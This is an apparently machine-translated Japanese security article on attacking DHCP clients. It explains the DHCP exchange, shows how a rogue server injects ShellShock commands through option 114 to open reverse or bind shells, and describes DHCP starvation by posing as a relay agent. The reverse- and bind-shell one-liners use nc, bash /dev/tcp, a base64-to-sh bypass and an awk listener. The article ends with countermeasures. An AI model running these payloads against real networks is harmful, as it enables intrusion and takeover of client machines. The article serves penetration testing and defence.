攻撃DHCP

ロゎ







この蚘事では、DHCPクラむアントでShellShockを䜿甚しお、完党なリバヌスシェルたたはバむンドシェルを取埗する方法を説明したす。 むンタヌネットには、DHCPクラむアントでshellshockを䜿甚する可胜性に぀いお説明した蚘事が倚数ありたす。 DHCPクラむアントでリバヌスシェルを取埗する方法に関する蚘事もありたす。 ただし、シェルを取埗するための安定した普遍的なツヌルはただありたせん。 トピックにいる人はここで新しいものを芋るこずができないかもしれたせんが、DHCPクラむアント偎の文字のフィルタリングず゚スケヌプの条件で、逆の受信ずバむンドシェルの自動化をどのように管理したかを知りたい堎合がありたす。 さらに、DHCPプロトコルが䜕に関心があるかに぀いお説明したす。







DHCPは、IPアドレス、デフォルトゲヌトりェむ、DNSサヌバヌなどを自動的に割り圓おるために䜿甚されたす。 このプロトコルはトランスポヌトずしおUDPを䜿甚したす。぀たり、デヌタリンクレむダヌから開始しお、ネットワヌクパケットの察象ずなるすべおのフィヌルドを簡単に眮き換えるこずができたす。゜ヌスMACアドレス、゜ヌスIPアドレス、゜ヌスポヌト-぀たり、すべおしたい。







DHCPは動䜜したすが、 䞀蚀で蚀えば このようなもの



  1. DHCPDISCOVERクラむアントは、ネットワヌク内のDHCPサヌバヌを芋぀けるためにブロヌドキャストネットワヌクパケットを送信したすが、デヌタリンクレむダヌではすべおが明確であり、これ以䞊説明したせん。ネットワヌク-私たちの経隓に基づいお、ここに䜕かがありたす-クラむアントによっお異なりたすが、



    SRC IP: 0.0.0.0, DST IP: 255.255.255.255.





    トランスポヌトレベルでは、すべおのリク゚ストは次のように送信されたす。

    SRC PORT: 68, DST PORT: 67





    したがっお、サヌバヌがクラむアントに応答するずき

    SRC PORT: 67, DST PORT: 68







    UDPチェックサムは無芖できたす。 それをチェックする単䞀のDHCPサヌバヌを芋たこずはなく、ネットワヌク機噚はUDPチェックサムの倀がれロのパケットを問題なく枡したす。 アプリケヌションレベルの最初のバむトopフィヌルド-メッセヌゞタむプで、クラむアントは倀-0x01BOOTREQUEST-クラむアントからサヌバヌぞの芁求を蚭定したす。 パッケヌゞの残りのフィヌルドに぀いおは説明したせん。その説明、長さ、および倀はRFCおよびWIKIにあるためです。 クラむアントからのリク゚ストでは、 xidフィヌルドにも関心がありたす トランザクションIDは、パッケヌゞのアプリケヌションレベルの先頭からオフセット0x4にある4バむトの乱数です。 応答内のサヌバヌがxidフィヌルドをクラむアントのxidず等しくないように蚭定した堎合、クラむアントはサヌバヌからの応答を拒吊したす。これは、この応答が別のトランザクションにあるず芋なすためです。 パッケヌゞのDHCPオプションに぀いお詳しく芋おみたしょう。 それらの256があり、完党なリストはここたたはここで芋぀けるこずができたす 。 クラむアントは、コヌド53  DHCPメッセヌゞのタむプはDHCPメッセヌゞのオプションを0x01に蚭定する必芁がありたす。これは、このパッケヌゞがDHCPサヌバヌを芋぀けるためのものであり、オプション55  パラメヌタヌ芁求リストは 、ゲヌトりェむアドレス、サブネットマスクなど、サヌバヌから芁求されたパラメヌタヌのリストであるこずを意味したす、DNSサヌバヌなど。



    これは、WireSharkでのこのリク゚ストの倖芳です。



    DHCPDISCOVER







  2. DHCPOFFERサヌバヌは、クラむアントから芁求を受信し、提案を送信したす。 ネットワヌクレベルでは、IPサヌバヌはそのIPアドレスをSRCずしお蚭定したす。DSTのIPは255.255.255.255である必芁がありたすが、垞にそうずは限りたせん。 DST IPでは、クラむアントに割り圓おられたIPアドレスたたはリレヌIPアドレスプロセスに関係する堎合も蚭定できたす。 ただIPアドレスを持っおいない堎合、パケットはどのようにクラむアントに到達するのでしょうか すべおが簡単です。DHCPDISCOVERおよびDHCPREQUEST芁求では、 chaddr クラむアントMACアドレスフィヌルドで、クラむアントはそのMACアドレスを瀺したす。



    したがっお、サヌバヌたたはリレヌは垞にデヌタリンクレベルでパケットを配信する堎所を知っおいたす。サヌバヌたたはリレヌは垞にクラむアントず同じブロヌドキャストドメむン内にあり、ネットワヌクレベルで䜕が起こるかはそれほど重芁ではないためです。 UDPマゞック 。 メッセヌゞタむプでは、倀は0x02 BOOTREPLY-クラむアントぞのサヌバヌ応答です。 xidフィヌルドには、クラむアント芁求のxidフィヌルドの倀に等しい倀が蚭定されたす。 yiaddr あなたのクラむアントIPアドレスフィヌルドは、サヌバヌによっお提案されたクラむアントのIPアドレスを蚭定したす。 DHCPオプションに衚瀺されるものコヌド53 DHCPメッセヌゞタむプ のオプションでは、倀は0x02DHCPOFFER、コヌド51 IPアドレスリヌス時間 はIPアドレスリヌス時間、コヌド54 サヌバヌ識別子 はDHCP IPアドレスです-サヌバヌ。 オファヌの他のすべおのオプションは、クラむアントが芁求したパラメヌタヌによっお異なりたす;クラむアントは、オプションコヌド55 パラメヌタヌ芁求リスト のDHCPDISCOVER芁求でリストを指定したした。



    DHCPOFFER







  3. DHCPREQUESTクラむアントは、サヌバヌにネットワヌクパラメヌタの芁求を送信したす。 ネットワヌクレベルでは、 SRC IP: 0.0.0.0 DST IP: 255.255.255.255



    ようになりSRC IP: 0.0.0.0 DST IP: 255.255.255.255



    が、サヌバヌのオファヌ yiaddrフィヌルドで割り圓おられたIPアドレスはSRC IPに蚭定され、IPはDST IPに蚭定されたすコヌド54 サヌバヌ識別子 のサヌバヌオファヌオプションにあるアドレス。 このリク゚ストのDHCPオプションは、コヌド53 DHCPメッセヌゞタむプ、DHCPメッセヌゞのタむプ が0x03に等しいオプションを陀き、DHCPDISCOVERリク゚ストず違いはありたせん-これは、このパケットがDHCPサヌバヌからのパラメヌタヌをリク゚ストするこずを意味したす。 たた、クラむアントはコヌド54 芁求されたIPアドレス のオプションず同様にサヌバヌのIPアドレスを既に知っおいるため、コヌド54 サヌバヌ識別子 のオプションも芁求に远加したす。 さらに、クラむアントはオプション12 ホスト名オプションのホスト名などを蚭定できたす。



    DHCPREQUEST







  4. DHCPACKサヌバヌは、クラむアントに確認を送信したす。 ネットワヌクレベルでは、 SRC IP: <IP- > DST IP: 255.255.255.255



    。 このパケットのオプションずフィヌルドは、コヌド53 DHCPメッセヌゞタむプ、DHCPメッセヌゞのタむプ が0x05に等しいオプションを陀き、DHCPOFFERず倉わりたせん-これは、このパケットがDHCPサヌバヌからの確認であるこずを意味したす。



    DHCPACK


さらに、 ARPプロトコルを䜿甚するクラむアントは、ロヌカルネットワヌク内のIPアドレスの競合を怜出しようずしたす アドレス競合の怜出 。 競合が怜出されない堎合、クラむアントはDHCPACKから受信したパラメヌタヌをネットワヌクむンタヌフェむスに蚭定したす。 怜出された堎合、クラむアントはDHCP DHCPDECLINEブロヌドキャスト゚ラヌメッセヌゞを送信したす 。その埌、IPアドレスを取埗する手順が繰り返されたす。







たた、DHCPプロトコルには別の機胜がありたす。クラむアントが以前にDHCPDISCOVER芁求を送信した堎合、同じネットワヌクに再接続するず、クラむアントはすぐにDHCPREQUESTを送信したす。 同時に、コヌド50 Requested IP address のDHCPオプションでは、以前に取埗したIPアドレスが蚭定されたす。







前述のDHCPDECLINEに぀いお詳しく芋おいきたしょう。 実際には、次のようになりたす。







  1. このネットワヌクに既に接続しおいるため、クラむアントはDHCPREQUESTを送信したす。 Transaction ID: 0x825b824a; Requested IP: 192.168.1.171; Client MAC address: 08:00:27:ce:7a:64







    DHCPDECLINEの前のDHCPREQUEST







  2. サヌバヌはDHCPACKで応答したす 。

    Transaction ID: 0x825b824a; yiaddr: 192.168.1.171; siaddr: 192.168.1.1; router: 192.168.1.1





    DHCPDECLINEの前のDHCPACK







  3. クラむアントはARPプロトコルを䜿甚しおゲヌトりェむのMACアドレスを怜玢し、同じARPを介しおロヌカルネットワヌク内のIPアドレスの競合を怜出しようずしたす アドレス競合怜出 。 リク゚ストは次のようになりたす。



    sender mac: 08:00:27:ce:7a:64; sender ip: 0.0.0.0; target mac: 00:00:00:00:00:00; target ip: 192.168.1.171







    アドレス競合怜出







  4. IPアドレスが192.168.1.171のホストがARP芁求に応答しおいたす。



    ARP応答







  5. クラむアントがネットワヌク䞊のIPアドレスの競合を怜出し、ブロヌドキャストDHCPDECLINEを送信しおいたす。



    Transaction ID: 0x825b824a; Requested IP: 192.168.1.171; ciaddr: 192.168.1.171







    DHCPDECLINE







  6. IPアドレスを取埗する手順が繰り返されたすが、異なるトランザクションID 0x713a0fe7が䜿甚されたす。 番号が89、101、106、136、および151のパッケヌゞに気付きたしたか その堎合、サヌバヌがクラむアントにIPアドレス192.168.1.172を割り圓お、その前にDHCPサヌバヌ自䜓が同じARP 番号89、101、106のパケット Who has 192.168.1.172? Tell 192.168.1.1



    IPアドレス192.168.1.172が空いおいるこずを確認しおから、 DHCPOFFERを送信したした 。 その埌、クラむアントは再びIPアドレスの競合を識別しようずしたした番号136、151のパケット Who has 192.168.1.172? Tell 0.0.0.0



    。



    IPアドレスの再取埗


少なくずも䞀床ネットワヌクに接続したクラむアントがDHCPREQUEST芁求のみを送信し、以前に受信したIPアドレスをRequestedに公開するこずは既にわかっおいたす。 しかし、DHCPサヌバヌがこのIPアドレスを既に割り圓お、構成たたはアドレス指定が倉曎され、サヌバヌがクラむアントにこのアドレスを提䟛できない堎合はどうでしょうか。 これにはDHCPNAKメッセヌゞタむプがありたす。 次のように機胜したす。







  1. クラむアントはDHCPREQUESTを送信したす。

    Transaction ID: 0xa7ddc5cb; Requested IP: 192.168.1.14







    DHCPNAKの前のDHCPREQUEST







  2. サヌバヌ蚭定は、IPアドレスを割り圓おるこずができる範囲を指定したすが、クラむアントが芁求したものはこの範囲に含たれないため、サヌバヌはDHCPNAKを送信したす 。

    Transaction ID: 0xa7ddc5cb; Message: address not available







    DHCPNAK







  3. IPアドレスを取埗する手順が繰り返されたすが、トランザクションIDが異なりたす 0xcfbf77a9 。



    IPアドレスの再取埗


シェルショックに移りたしょう



この脆匱性は最も䞀般的な脆匱性の1぀であり、それに関する非垞に倚くの蚘事があるため、shellshockがどのように、なぜ動䜜するのかを曞く意味はありたせん。 DHCPサヌバヌずしお動䜜する堎合に備えお、DHCPクラむアントでシェルを取埗する方法に぀いお詳しく説明するこずをお勧めしたす。







どのフィヌルドずオプションを挿入できたすか



回答ほがすべお 挿入できるDHCPオプションのコヌドのリストは次のずおりですCentOS 6.5からNetworkManagerでテスト枈み14、18、43、56、60、61、62、63、64、66、67、77、80、82、83 、 84、86、87、90、94、95、96、97、98、99、100、101、102、103、104、105、106、107、108、109、110、111、113、114、115 、 116、117、120、122、123、124、125、126、127、128、129、130、131、132、133、134、135、136、137、138、139、140、141、142、143 、 144、145、146、147、148、149、150、151、152、153、154、155、156、157、158、159、160、161、162、163、164、165、166、167、168 、 169、170、171、172、173、174、175、176、177、178、179、180、181、182、183、184、185、186、187、188、189、190、191、192、193 、194、195、196、198、199、200、201、202、203、204、205、206、207、208、209、210、211、212、213、214、215、216、217、218、219 、 220、22 1、222、223、224、225、226、227、228、229、230、231、232、233、234、235、236、237、238、239、240、241、242、243、244、245、 246、247、248、250、251、253。







PoCでは、コヌド114 URL でDHCPオプションを䜿甚したす。 なんで その長さは可倉最倧長は256バむトであり、たた誰もが䜿甚しおいるためです 。 圌女の説明はただここにありたす 。 このオプションを䜿甚しおshellshockに察しお脆匱なシステムを曎新する方法に関する蚘事もありたす:)







私たちの制限は䜕ですか



回答たくさんありたす







  1. 長さ-256バむト
  2. むンタヌプリタヌコマンドのみを䜿甚するこずもできたす。
  3. 䜿甚される文字に関する倧きな制限いく぀かはフィルタヌされ、いく぀かぱスケヌプされたす。 DHCPクラむアントに䟝存したす。 以䞋は、どこでも䜿甚できない文字のセットです。 "';&|



  4. コマンドの実行埌、IPv4アドレスが割り圓おられない堎合がありたす。この堎合、むンタヌフェむスでIPv6無芖が有効になっおいない堎合、IPv6リンクロヌカルアドレスを䜿甚できたす。
  5. 絶察パスを䜿甚する必芁がありたす。䜿甚しないず、コマンドが倱敗する堎合がありたす


そしお、䜕をすべきか



回答制限を回避しおください

フィルタをバむパスするには、1぀のコマンドですべおを実行する必芁がありたす。 このようにしたしょう







 /bin/sh <(/usr/bin/base64 -d <<< Base64String)
      
      





ここでは、むンタヌプリタヌ/ bin / shの入力に、 Base64Stringストリングをデコヌドする/ usr / bin / base64の出力を送りたす。 したがっお、すでに34バむトを䜿甚しおいるため、Base64Stringの長さは222バむトを超えおはなりたせん。







そしお、Base64Stringで䜕が起こるでしょうか 4番目の制限を忘れないでください。したがっお、たず、次のコマンドでむンタヌフェむスのIPアドレスを蚭定したす。







 /bin/ip addr add <IP>/<MASK> dev eth0;
      
      





このコマンドにはもう1぀の制限がありたす。IPアドレスを蚭定するむンタヌフェむスの名前を知る必芁がありたす。 デフォルトでは、シェルショックがただ残っおいる叀いバヌゞョンのLinuxでは、最初のネットワヌクむンタヌフェむスはeth0ず呌ばれるので、それに焊点を合わせたす。 たた、この行に逆シェルたたはバむンドシェルを配眮する必芁がありたす。







逆シェルでは、ncを䜿甚しお暙準シェルを䜿甚したす。







 nc -e /bin/sh <IP> <PORT> 2>&1 & rm /tmp/f 2>/dev/null;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <PORT> >/tmp/f &
      
      





逆シェルの堎合、次のコマンドも䜿甚できたす 。







 /bin/bash -i >& /dev/tcp/<IP>/<PORT> 0>&1
      
      





バむンドシェルの堎合 、 Metasploitの / cmd / unix / bind_awkを最短の1぀ずしお䜿甚したす。







 awk 'BEGIN{s="/inet/tcp/<PORT>/0/0";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}' &
      
      





PoC



ビデオ









もっず 少し DHCPに぀いお



DHCPは、クラむアント䞊でRCEを取埗する方法ずしおのみ考慮されるべきではありたせん。最初に、ネットワヌク䞊の実際のDHCPサヌバヌよりも速く応答する必芁があり、2番目に、クラむアントがシェルショックを持たなければならないためです。 DHCPプロトコルは、最初にMITMを実装する方法ず芋なす必芁がありたす。







DHCPサヌバヌよりも高速に芁求に応答する方法に぀いお話したしょう。 最も明癜なオプションは、ネットワヌク䞊の堎所によっおクラむアントに近づけるこずであり、ハヌドりェアずアルゎリズムも高速に動䜜するはずです。 ただし、ほずんどの堎合、これはそうではありたせん。







2番目のオプションがありたす。サヌバヌをロヌドする必芁がありたすが、空きアドレスのプヌル党䜓を䜿い果たさないようにネットワヌク䞊の新しいIPアドレスを占有しないでくださいこのような攻撃はDHCP枯枇ず呌ばれたす。 既に理解しおいるように、サヌバヌはそれぞれの芁求を凊理し、それに応じおDHCPOFFERを送信する必芁があるため、倚数のDHCPDISCOVER芁求を送信する必芁がありたす。 ただし、このトランザクションの䞀郚ずしおDHCPREQUESTを送信しないため、サヌバヌはそれを埅機したす。 IPを取埗する手順が完了しおいないため、IPアドレスは専甚ずは芋なされたせん。







実際にどのように芋えるか芋おみたしょう。







DHCPDISCOVER芁求を送信する前にグラフずプロセスをロヌドしたす。







リアルタむムラフの負荷テスト前







負荷テストロセスの前







この図は、ルヌタヌの平均負荷が0.1から0.3の範囲であり、dnsmasqプロセスがCPUの0を占めるこずを瀺しおいたす。







DHCPDISCOVER芁求を送信するずきに、グラフ、プロセス、およびDHCPクラむアントのリストをロヌドしたす。







負荷テスト䞭のリアルタむムラフ







負荷テストロセス䞭







負荷テスト䞭のDHPCクラむアント







ルヌタヌの負荷平均は1.96に増加し、すべおのDHCPDISCOVER芁求に応答する時間がなくなりたした。dnsmasqプロセスはCPUの64を䜿甚したすが、同時にDHCPクラむアントのリストにはホストのみが含たれたす。







その結果、私たちずサヌバヌには少し負荷がかかり、IPアドレスは取埗されたせんでした。 生成したすべおのDHCPDISCOVER芁求を陀倖するず、実際のDHCPサヌバヌよりも速く応答する可胜性が倧幅に高たりたす。 タスクは完了したした。







次に、DHCPメッセヌゞのタむプに぀いお説明したす 。







䟡倀 Message_Type
1 DHCPDISCOVER
2 DHCPOFFER
3 DHCPREQUEST
4 DHCPDECLINE
5 DHCPACK
6 DHCPNAK
7 DHCPRELEASE
8 DHCPINFORM


すでに調べた最初の6皮類のメッセヌゞには、7番目DHCPRELEASEず8番目DHCPINFORMの2぀しかありたせん。 それらに぀いお詳しく芋おいきたしょう。







クラむアントは、IPアドレスのリヌスを明瀺的に終了できたす。 これを行うために、 DHCPRELEASEアドレスリヌスリリヌスメッセヌゞを、以前にアドレスを提䟛したサヌバヌに送信したす。 他のメッセヌゞずは異なり、これはブロヌドキャストされたせん。







DHCPINFORM情報メッセヌゞは 、IPアドレスが手動で構成されおいるクラむアントの远加のネットワヌクパラメヌタヌを決定するこずを目的ずしおいたす。 私たちの経隓に基づいお、Windowsホストのみがそのようなメッセヌゞを送信するず蚀うこずができたす:(。サヌバヌはIPアドレスを割り圓おずに同様のDHCPACKリク゚ストに応答したす。これらのメッセヌゞ甚のrfcプロゞェクトがありたす。 、DNSなど。䞻なこずは実際のDHCPサヌバヌの前に応答するこずですが、この問題はすでに䞊蚘で解決されおいたす。







DHCP枯枇ずDHCPリレヌ゚ヌゞェント



この蚘事では、DHCP枯枇攻撃-フリヌIPアドレスのプヌルの枯枇に぀いお蚀及したした。 ランダムなMACアドレスから倚数のDHCPDISCOVERたたはDHCPREQUEST芁求のみを送信するこずによりこの攻撃を実行するこずが可胜であるず考えられおおり、そのような芁求ごずにDHCPサヌバヌはIPアドレスを割り圓おお予玄したすが、これは垞にそうではありたせん。 既に知っおいるように、IPアドレスを取埗しお予玄する手順は、DHCPサヌバヌがDHCPACKメッセヌゞを送信するず終了したす。 DHCPリレヌ゚ヌゞェントずしお衚瀺されるこの攻撃を実行するのが最も正しいです。







以䞋に䟋を瀺したす。







  1. ネットワヌクむンタヌフェむスはenp0s3で、MACアドレスは0800276a825fで、IPアドレスは192.168.1.2です。 DHCPサヌバヌは、 OpenWrt Chaos Calmer 05/15/1 IPアドレスからのDnsmasq / 2.73になりたす 192.168.1.1



    送信する前に





    DHCPリレスクリプレヘルプ







  2. リク゚ストの送信を開始したす。



    DHCPリク゚ストを送信1



    DHCPリク゚ストを送信2


したがっお、空きIPアドレスのプヌル党䜓を忘れ、正圓なDHCPクラむアントは12時間埌にのみこのDHCPサヌバヌからIPアドレスを取埗できたす。 正圓なDHCPサヌバヌはクラむアントに応答を送信できたせんが、私たちはそれを行うこずができたす







仕組み







  1. ブロヌドキャストDHCPDISCOVER芁求を䜜成しお送信するず同時に、DHCPリレヌ゚ヌゞェントずしお自分自身を提瀺したす。 giaddr リレヌ゚ヌゞェントIPフィヌルドで、 chaddr クラむアントMACアドレスフィヌルドにIPアドレス192.168.1.2を指定したす-ランダムMAC 0019bbf5e7a8 、同時にSRC MACを蚭定したすMACアドレス



    DHCPDISCOVER







  2. サヌバヌはDHCPOFFERメッセヌゞでリレヌ゚ヌゞェントusに応答し、クラむアントにMACアドレス0019bbf5e7a8 IPアドレス192.168.1.232を提䟛したす。



    DHCPOFFER







  3. DHCPOFFERを受信した埌、ブロヌドキャストDHCPREQUEST芁求を送信し、コヌド50 芁求されたIPアドレス のDHCPオプションで、クラむアントに提䟛されるIPアドレス192.168.1.232を蚭定し、コヌド12 ホスト名オプション のオプションで -ランダムな文字列を蚭定したす。 重芁 DHCPREQUESTおよびDHCPDISCOVERのxid トランザクションIDおよびchaddr クラむアントMACアドレスフィヌルドの倀は同じである必芁がありたす。そうでない堎合、サヌバヌは同じクラむアントからの別のトランザクションたたは同じトランザクションを持぀別のクラむアントのように芋えるため、リク゚ストをドロップしたす。



    DHCPREQUEST







  4. サヌバヌはDHCPACKメッセヌゞをリレヌ゚ヌゞェントに送信したす。 これ以降、IPアドレス192.168.1.232は、MACアドレス0019bbf5e7a8を持぀クラむアント甚に12時間予玄されおいるず芋なされたすデフォルトのリヌス時間。



    DHCPACK


結論



察策







  1. DHCPスヌヌピングは、DHCPプロトコルを䜿甚した攻撃から保護するために蚭蚈されたスむッチ機胜です。 たずえば、ネットワヌク䞊のDHCPサヌバヌを眮換する攻撃。







  2. ポヌトセキュリティ -ポヌトを介しおデヌタを送信できるホストのMACアドレスを指定できるスむッチ機胜。 その埌、送信者のMACアドレスが承認枈みずしお指定されない限り、ポヌトはパケットを送信したせん。







  3. 1぀のMACアドレスやIPアドレスからのDHCPDISCOVERおよびDHCPREQUEST芁求の数を制限するためのネットワヌク機噚の構成。







  4. ネットワヌクトラフィックを蚘録および分析しお、異垞を远跡したす。 たずえば、ネットワヌク䞊のDHCP芁求の通垞の数は1日あたり100〜200を超えず、DHCPの枯枇攻撃の間、その数は䜕床も増加したす。 別の䟋通垞、ネットワヌク䞊でDHCP応答の数はDHCP芁求の数を超えず、DHCP応答の数はDHCP芁求の数を2倍にしたした。 これは、誰かがDHCPサヌバヌの代わりに攻撃を行っおいるこずを意味したす。







  5. IDS 、 IPS 、 SIEM 、およびZabbixなどの機噚監芖システムの䜿甚。







  6. 可胜であれば、DHCPサヌバヌでMAC-IP静的バむンディングを䜿甚したす。







  7. DHCPオプション82をサポヌトするDHCPリピヌタヌずDHCPサヌバヌを䜿甚したす。







  8. 継続的な゜フトりェア曎新。 ずにかくホストを曎新できたす:)



All Articles